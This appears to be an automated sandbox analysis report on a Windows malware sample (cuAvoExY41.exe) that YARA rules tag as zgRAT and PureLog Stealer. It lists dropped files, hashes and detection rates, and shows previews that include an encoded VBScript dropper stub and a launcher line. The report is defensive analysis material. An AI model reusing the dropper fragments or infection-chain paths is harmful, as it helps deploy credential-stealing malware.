                                                        SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                        MD5:E9CE850DB4350471A62CC24ACB83E859
                                                        SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                        SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                        SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                        • Antivirus: Virustotal, Detection: 69%, Browse
                                                        Process:C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):23552
                                                        Entropy (8bit):5.519109060441589
                                                        Encrypted:false
                                                        SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                        MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                        SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                        SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                        SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                        • Antivirus: Virustotal, Detection: 11%, Browse
                                                        Process:C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33792
                                                        Entropy (8bit):5.541771649974822
                                                        Encrypted:false
                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                        • Antivirus: Virustotal, Detection: 27%, Browse
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):23552
                                                        Entropy (8bit):5.519109060441589
                                                        Encrypted:false
                                                        SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                        MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                        SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                        SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                        SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                        • Antivirus: Virustotal, Detection: 11%, Browse
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32256
                                                        Entropy (8bit):5.631194486392901
                                                        Encrypted:false
                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                        • Antivirus: Virustotal, Detection: 29%
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33792
                                                        Entropy (8bit):5.541771649974822
                                                        Encrypted:false
                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                        • Antivirus: Virustotal, Detection: 27%
                                                        Process:C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):69632
                                                        Entropy (8bit):5.932541123129161
                                                        Encrypted:false
                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        • Antivirus: Virustotal, Detection: 22%
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):69632
                                                        Entropy (8bit):5.932541123129161
                                                        Encrypted:false
                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        • Antivirus: Virustotal, Detection: 22%
                                                        Process:C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):85504
                                                        Entropy (8bit):5.8769270258874755
                                                        Encrypted:false
                                                        SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                        MD5:E9CE850DB4350471A62CC24ACB83E859
                                                        SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                        SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                        SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                        • Antivirus: Virustotal, Detection: 69%
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):104
                                                        Entropy (8bit):5.358469646481112
                                                        Encrypted:false
                                                        SSDEEP:3:mwLHM0NzyWjO3xCVkDGMZC+H5oRke8:mww+a3oOaMZL5MN8
                                                        MD5:BF012358CC0C86F1701A536E004B33B2
                                                        SHA1:4F55A2DBE09700249B72CB040331137220C6975F
                                                        SHA-256:6C146DE3DE9AFB747F1CA512EA41B83663E859AF45A2B9380ACCE7BCE062212D
                                                        SHA-512:8D9DD0528A49C64F21D1A372C0BDDCA87DAB3C38769C5A84948F649574DC5E3BE17414C745A8C166A51E1D51D505B39B0A2D16196355E481462578B7328F1A49
                                                        Malicious:false
                                                        Preview:DDsmGuMmcxwVBu7uu4bIciBQneQVpAkDDqFOFRAtp6HPApCTaNpAypnfCc9ld06bMsSVptpc3rcgavP8b74cVjPYDkMmSYQy9qCSXrnr
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1956864
                                                        Entropy (8bit):7.550310758182276
                                                        Encrypted:false
                                                        SSDEEP:24576:6/jcka6RF0Xq5wBy8CXd51UlsyADTXmFNoCYS7+q/f/ng5PPZo+7VIuK:6iydNfyADTXWNoCp73MPPZp7V
                                                        MD5:5FA91A09D2073FA85C2B69A00EA7C1FC
                                                        SHA1:E8D22ECAECABEECB6FA2C3402B8D4B5F31105B47
                                                        SHA-256:4DCF80B093CF4801B969F6301391A281563FBDFC5B7FBFCF8457981E03CA0C61
                                                        SHA-512:C1CAD8E19C33326A3AFADCBE3BDF14D3BFC619A315129F0027275022FA870F1A2310667B0AF7E8FF65F4C0E0E29E937E36D936DD1CD938A4CA78DFF1B235E9F5
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                        • Antivirus: Virustotal, Detection: 55%
                                                        Process:C:\Users\user\Desktop\cuAvoExY41.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):104
                                                        Entropy (8bit):5.004250987430439
                                                        Encrypted:false
                                                        SSDEEP:3:WTxon3K+ARtyAHoIQqxAjnI3+6TMxoHLM2L4zRn:Uxo6+ULfInA+3oY2kNn
                                                        MD5:84A0520B29117EE45FE684C266E86C3B
                                                        SHA1:2DC7BF59E263FFFAE8CDC3FE230DC09279726A80
                                                        SHA-256:073EB5E2E24AA27DF69B69E9FEE0F8CACD7808247B72F3E1168B272522615BB3
                                                        SHA-512:2716E51C302AD93F9D9711C8198D6C5B15A2C118819B318B33111F37FA84EE132B29808D26BBB39469C0A4EE4B0CD5B074C129E28C77361D889D4F863E6A47ED
                                                        Malicious:false
                                                        Preview:%CvunvjmLeMegRP%%KYO%..%AltHDA%"C:\surrogateFontdhcpCommon/ChainPortServerBrowsermonitor.exe"%nJKTwdrDO%
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):166
                                                        Entropy (8bit):5.648240321319942
                                                        Encrypted:false
                                                        SSDEEP:3:vcf9gjmURSx9skA/5Ypw5ohD0ktTsfCGdoTcdoSmN7gvEzgPfn:o9gaU0PsxKpbakFsfZdoTcdoLBIJf
                                                        MD5:55DD91A1A71EF89E223FE06F5F4C0453
                                                        SHA1:623D337801CD53F7A0620317265E065977384B9F
                                                        SHA-256:65B7FBEE46AC997D1E78716BFDE7147A35A01FF71129A90C082AA352AFAAA5F0
                                                        SHA-512:78951AB4B914DF850D82FBE84A975A0D89AEABD70EDBB4F8D23C74C228944B5364D6BD7C001201A2129B404E21306B6A8EECFA52D9C882EDFA17F2C3A9B8EB60
                                                        Malicious:false
                                                        Preview:Iky7IXEe5SAHFK04H14wFhXiWMoY39eeZ5DemtbJLPzJ4QV24FL2FdDlMQl6spl5ygrJHWSXZul0sOnG1wexymZ51cRWIfbfo3VYiMvixxdV2N37meF5LxGMHvRoE5P3SFMy3OhpA5AAIDDoiUtnafT0wIRx4Ge1ikCwAE
                                                        Process:C:\Users\user\Desktop\cuAvoExY41.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1956864
                                                        Entropy (8bit):7.550310758182276
                                                        Encrypted:false
                                                        SSDEEP:24576:6/jcka6RF0Xq5wBy8CXd51UlsyADTXmFNoCYS7+q/f/ng5PPZo+7VIuK:6iydNfyADTXWNoCp73MPPZp7V
                                                        MD5:5FA91A09D2073FA85C2B69A00EA7C1FC
                                                        SHA1:E8D22ECAECABEECB6FA2C3402B8D4B5F31105B47
                                                        SHA-256:4DCF80B093CF4801B969F6301391A281563FBDFC5B7FBFCF8457981E03CA0C61
                                                        SHA-512:C1CAD8E19C33326A3AFADCBE3BDF14D3BFC619A315129F0027275022FA870F1A2310667B0AF7E8FF65F4C0E0E29E937E36D936DD1CD938A4CA78DFF1B235E9F5
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                        • Antivirus: Virustotal, Detection: 55%
                                                        Process:C:\Users\user\Desktop\cuAvoExY41.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):253
                                                        Entropy (8bit):5.968174814732222
                                                        Encrypted:false
                                                        SSDEEP:6:GEvwqK+NkLzWbHZEG8nZNDd3RL1wQJRkaTKfCeW+098Nmids:GbMCzWL6G4d3XBJYUHC0iC
                                                        MD5:68277663193A50A0F25BEB2B38F1D2EF
                                                        SHA1:84927FB9599B7DC0BD4F1B25ABCDEB75EBF9D762
                                                        SHA-256:F0B970B22CC955B64A660F835A378DCAE06011783CC8BBF30F35269A887DEDB9
                                                        SHA-512:640FC43C16187B39CE868B65560509D5CE7CA1B5B59BDD5CBBF8D25EA8AD3E238220F48FBB953C60A65D7279D2BA9E4EAB4DDDB5BC048B5B402A49BD721463AB
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        Preview:#@~^5AAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v&T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJ/;MDKolD+wGxDN4maZGhsWxJ&%",E++rfmo`%im{CKx;nd/!O;s2gsIWzwF4W5{XSdXcXW*INRCVUR8lDJS~Z~P6CVk+zEkAAA==^#~@.
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:ASCII text, with very long lines (378), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):378
                                                        Entropy (8bit):5.82922407849562
                                                        Encrypted:false
                                                        SSDEEP:6:cWHZzDKt9xxWbEZLVvbwjV3LlBUTHFzOGzC/14Zsh1L/s0ZTycl0GHR9cMtrIvlE:DHtc9x4bEhxbiVbTsHFaP4u1L02TyPOp
                                                        MD5:BE44573738C28AEF11C8F61F47D06F37
                                                        SHA1:6DF35F7A057128659836C0062FF44880496191FB
                                                        SHA-256:EF654B580B63B19D2D0D6BD2EBA63422B452EE417539C33ACB0031AD0B387B98
                                                        SHA-512:E2B34C7F796B779618F999D8B2815260BC9BD7A25624A5CD26E40A7DAEF0CE33FC16A7A98D2B3966451003972DD7445B74B778436F5F5B3B2891CA5C0E89F8E5
                                                        Malicious:false
                                                        Preview:2NT3fhQZrGSXrux1V6fczsmMGc80ZILhcvbWAkn3GMZPRZRRHLIlF4hJlHwDja9j4u56Sb1uTlWmTX4qKqsO9kchORv3yjTpNzUheV8qUYRdh40OMF32rvkUSXsAq76uRqZdCXMysC3kS8ATbgrsqb8bOAOGn79WbhM1fWLy3EKo29BTXYjJQOD0s7OBJFLuDhJvwIxFV2ymRTjP94tOYzFNdVIhHKox3ZlU0PhOldyXZbiZY9COW6WNb5Ra9P8KNAs2sOYtXen5BrxCwtJHHab6CX348GOVfnKZsqrJlS01TbMtIPnQF0CxjvzUVdvRQRaXhYTGCAgzjjnlLJwtc8QokWz61WyHgjlBBzLt5hOFUNN9INJLqCyRBv
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1956864
                                                        Entropy (8bit):7.550310758182276
                                                        Encrypted:false
                                                        SSDEEP:24576:6/jcka6RF0Xq5wBy8CXd51UlsyADTXmFNoCYS7+q/f/ng5PPZo+7VIuK:6iydNfyADTXWNoCp73MPPZp7V
                                                        MD5:5FA91A09D2073FA85C2B69A00EA7C1FC
                                                        SHA1:E8D22ECAECABEECB6FA2C3402B8D4B5F31105B47
                                                        SHA-256:4DCF80B093CF4801B969F6301391A281563FBDFC5B7FBFCF8457981E03CA0C61
                                                        SHA-512:C1CAD8E19C33326A3AFADCBE3BDF14D3BFC619A315129F0027275022FA870F1A2310667B0AF7E8FF65F4C0E0E29E937E36D936DD1CD938A4CA78DFF1B235E9F5
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\surrogateFontdhcpCommon\upfc.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\surrogateFontdhcpCommon\upfc.exe, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                        • Antivirus: Virustotal, Detection: 55%
                                                        Process:C:\Windows\System32\PING.EXE
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):502
                                                        Entropy (8bit):4.606362154056947
                                                        Encrypted:false
                                                        SSDEEP:12:POJa95pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:WJ6dUOAokItULVDv
                                                        MD5:479265214B7D40F1F133ADCA59674F38
                                                        SHA1:5CE8DE4410682925D3BB0CDBBB4A03405DEAE389
                                                        SHA-256:524C3EB619E3D256AE2A24827D731AE5943268FC14FFE6D619E2E84C3119C941
                                                        SHA-512:44D56680467E77DF23F04F7134ED52898347930E4A6F2D52287C24C8799BC91A93F10BD0FEC9A09D27FD607303FD0397A1F78486DACC92637C0FF167AD7ED34C
                                                        Malicious:false
                                                        Preview:..Pinging 123716 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):7.488244602209198
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                        • Win32 Executable (generic) a (10002005/4) 49.97%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:cuAvoExY41.exe
                                                        File size:2'278'706 bytes
                                                        MD5:7ddacbfdacd9e8aeacd1b0f2dea51f4e
                                                        SHA1:36667e13972c28da816f52fd4ef2b910e50de531
                                                        SHA256:dc6859bdfc93d108f11e63dc630453b11c0be85446fd448d3c2c1aa5ad4ce077
                                                        SHA512:3d1b6f46e4d0a2d124250efe77d30d5ad03c2cd2db0e5df9d4bdca0c10facb5f546497d7584ca18de1d1c3616ecd5e5d000bb082e7c30a889a2a3415649c28d1
                                                        SSDEEP:24576:2TbBv5rUyXVS/jcka6RF0Xq5wBy8CXd51UlsyADTXmFNoCYS7+q/f/ng5PPZo+7/:IBJSiydNfyADTXWNoCp73MPPZp7Vl
                                                        TLSH:E5B5BF0695D24E77C2A097318457143E5294EA327972EF1B764F10A6AC13BF1CBB32BB
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
                                                        Icon Hash:1515d4d4442f2d2d
                                                        Entrypoint:0x41f530
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:5
                                                        OS Version Minor:1
                                                        File Version Major:5
                                                        File Version Minor:1
                                                        Subsystem Version Major:5
                                                        Subsystem Version Minor:1
                                                        Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                        Instruction
                                                        call 00007FC60489F78Bh
                                                        jmp 00007FC60489F09Dh
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        push ebp
                                                        mov ebp, esp
                                                        push esi
                                                        push dword ptr [ebp+08h]
                                                        mov esi, ecx
                                                        call 00007FC604891EE7h
                                                        mov dword ptr [esi], 004356D0h
                                                        mov eax, esi
                                                        pop esi
                                                        pop ebp
                                                        retn 0004h
                                                        and dword ptr [ecx+04h], 00000000h
                                                        mov eax, ecx
                                                        and dword ptr [ecx+08h], 00000000h
                                                        mov dword ptr [ecx+04h], 004356D8h
                                                        mov dword ptr [ecx], 004356D0h
                                                        ret
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        push ebp
                                                        mov ebp, esp
                                                        push esi
                                                        mov esi, ecx
                                                        lea eax, dword ptr [esi+04h]
                                                        mov dword ptr [esi], 004356B8h
                                                        push eax
                                                        call 00007FC6048A252Fh
                                                        test byte ptr [ebp+08h], 00000001h
                                                        pop ecx
                                                        je 00007FC60489F22Ch
                                                        push 0000000Ch
                                                        push esi
                                                        call 00007FC60489E7E9h
                                                        pop ecx
                                                        pop ecx
                                                        mov eax, esi
                                                        pop esi
                                                        pop ebp
                                                        retn 0004h
                                                        push ebp
                                                        mov ebp, esp
                                                        sub esp, 0Ch
                                                        lea ecx, dword ptr [ebp-0Ch]
                                                        call 00007FC604891E62h
                                                        push 0043BEF0h
                                                        lea eax, dword ptr [ebp-0Ch]
                                                        push eax
                                                        call 00007FC6048A1FE9h
                                                        int3
                                                        push ebp
                                                        mov ebp, esp
                                                        sub esp, 0Ch
                                                        lea ecx, dword ptr [ebp-0Ch]
                                                        call 00007FC60489F1A8h
                                                        push 0043C0F4h
                                                        lea eax, dword ptr [ebp-0Ch]
                                                        push eax
                                                        call 00007FC6048A1FCCh
                                                        int3
                                                        jmp 00007FC6048A3A67h
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        push 00422900h
                                                        push dword ptr fs:[00000000h]
                                                        Programming Language:
                                                        • [ C ] VS2008 SP1 build 30729
                                                        • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3d070 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d0a4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0xdff8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x72000 | 0x233c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b11c | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x355f8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x278 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3c5ec | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x31bdc | 0x31c00 | 2831bb8b11e3209658a53131886cdf98 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x33000 | 0xaec0 | 0xb000 | 042f11346230ca5aa360727d9908e809 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x24720 | 0x1000 | 9670b581969e508258d8bc903025de5e | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x63000 | 0x190 | 0x200 | c83554035c63bb446c6208d0c8fa0256 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x64000 | 0xdff8 | 0xe000 | ba08fbcd0ed7d9e6a268d75148d9914b | False | 0.6373639787946429 | data | 6.638661032196024 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x72000 | 0x233c | 0x2400 | 40b5e17755fd6fdd34de06e5cdb7f711 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x64650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x65198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x66748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
